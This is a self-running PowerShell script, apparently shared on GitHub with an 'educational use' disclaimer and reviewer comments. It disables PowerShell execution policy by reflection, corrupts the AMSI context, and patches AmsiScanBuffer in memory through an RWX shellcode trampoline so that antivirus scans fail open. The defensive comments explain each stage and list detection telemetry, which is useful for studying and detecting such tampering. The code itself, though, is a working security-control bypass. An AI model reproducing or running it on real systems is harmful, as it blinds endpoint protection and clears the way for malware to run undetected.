# --- Author: zetod1ce (github.com/ztd38f) --- #
# --- DISCLAIMER: Provided as-is, without warranties. For educational and testing use only in controlled environments. Use at your own risk. --- #

# Reviewer notes (defensive context):
#   This script tampers with two in-process PowerShell security controls and
#   invokes itself at the bottom of the file, so merely dot-sourcing it runs it:
#     1. It swaps the session's AuthorizationManager for a fresh base-class
#        instance via private reflection; the base class permits everything,
#        so execution policy is no longer enforced for this session.
#     2. It zeroes the AMSI context the PowerShell engine holds, then
#        overwrites the first bytes of amsi!AmsiScanBuffer with a jump to a
#        stub that returns an error HRESULT, so later scans fail open.
#   Telemetry a detection engineer would expect from this (confirm per
#   platform): reflection into System.Management.Automation internals, an RWX
#   private allocation, VirtualProtect on amsi.dll's code pages followed by a
#   write to that range, and Add-Type compiling inline C# (on Windows
#   PowerShell 5.1 this typically goes through csc.exe and leaves a temporary
#   DLL on disk).
#   Every failure in the C# stage is swallowed by a blanket catch, so the
#   caller gets no signal whether the patch actually landed.
function PS.SecurityBypass {
    # Stage 1: execution-policy bypass, evaluated through iex (Invoke-Expression).
    # Reads the engine's private ExecutionContext ("_context") with BindingFlags
    # NonPublic|Instance (36), locates its field whose name contains "auth"
    # and replaces it with a new AuthorizationManager constructed for the
    # "Microsoft.PowerShell" shell id.
    iex '((($x=$executionContext.GetType().GetField("_context",36).GetValue($executionContext)).GetType().GetFields(36)|?{$_.Name -like "*auth*"}).SetValue($x,(New-Object Management.Automation.AuthorizationManager Microsoft.PowerShell)))'
    # Stage 2: AMSI context corruption.
    # In the engine assembly ([Ref].Assembly) finds the type whose name matches
    # "*iu*" and its NonPublic|Static (40) field matching "*ic*" (the wildcards
    # are consistent with AmsiUtils.amsiContext - confirm on the target
    # version), reads the pointer stored there and copies nine zero bytes to
    # that address, invalidating the context used for subsequent scans.
    iex '([Runtime.InteropServices.Marshal]::Copy([byte[]](@(0)*9),0,[IntPtr]((([Ref].Assembly.GetTypes()|?{$_.Name -like "*iu*"}).GetFields(40)|?{$_.Name -like "*ic*"})|%{$_.GetValue($null)}),9))'
    # Stage 3: in-process patch of amsi!AmsiScanBuffer. The C# below is
    # compiled by Add-Type; the class name SB is referenced after the
    # here-string. Note this is a double-quoted here-string, so any "$" in
    # the C# source would be interpolated by PowerShell (there are none).
    Add-Type @"
using System;
using System.Runtime.InteropServices;

public class SB
{
    [DllImport("kernel32.dll")]
    private static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")]
    private static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi)]
    private static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
    private static extern IntPtr GetModuleHandle(string lpModuleName);
    // The next two imports are declared but never called from X().
    [DllImport("kernel32.dll")]
    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, out uint lpThreadId);
    [DllImport("kernel32.dll")]
    private static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);

    // Overwrites the entry of AmsiScanBuffer in the already-loaded amsi.dll so
    // every call returns immediately with an error HRESULT. x64-only: the
    // encoded instructions carry the REX.W prefix (mov rax, imm64). Does
    // nothing if amsi.dll is not loaded or the export is not found; any
    // exception (access violation, marshalling failure, ...) is swallowed.
    public static void X()
    {
        try
        {
            IntPtr hAmsi = GetModuleHandle("amsi.dll");
            IntPtr scanFunc = GetProcAddress(hAmsi, "AmsiScanBuffer");
            if (scanFunc != IntPtr.Zero)
            {
                // 1024 bytes, MEM_COMMIT (0x1000), PAGE_EXECUTE_READWRITE (0x40).
                // The returned pointer is not checked for IntPtr.Zero.
                IntPtr execMem = VirtualAlloc(IntPtr.Zero, 1024, 0x1000, 0x40);
                // Stub: mov rax, 0x80070057 (E_INVALIDARG); ret
                byte[] shellcode = {0x48, 0xB8, 0x57, 0x00, 0x07, 0x80, 0x00, 0x00, 0x00, 0x00, 0xC3};
                Marshal.Copy(shellcode, 0, execMem, shellcode.Length);
                uint oldProtect;
                // Make the target writable. NOTE(review): the length passed is
                // shellcode.Length (11) while jmpCode written below is 12 bytes;
                // the return value of VirtualProtect is not checked.
                VirtualProtect(scanFunc, (uint)shellcode.Length, 0x40, out oldProtect);
                // Trampoline: mov rax, <execMem>; jmp rax  (imm64 filled in at offset 2)
                byte[] jmpCode = {0x48, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF, 0xE0};
                BitConverter.GetBytes(execMem.ToInt64()).CopyTo(jmpCode, 2);
                Marshal.Copy(jmpCode, 0, scanFunc, jmpCode.Length);
                // Restore the previous protection on the patched range.
                VirtualProtect(scanFunc, (uint)shellcode.Length, oldProtect, out oldProtect);
            }
        }
        catch (Exception) {}
    }
}
"@; [SB]::X()
};
# Self-invocation: loading this file runs the bypass immediately in the
# current process.
PS.SecurityBypass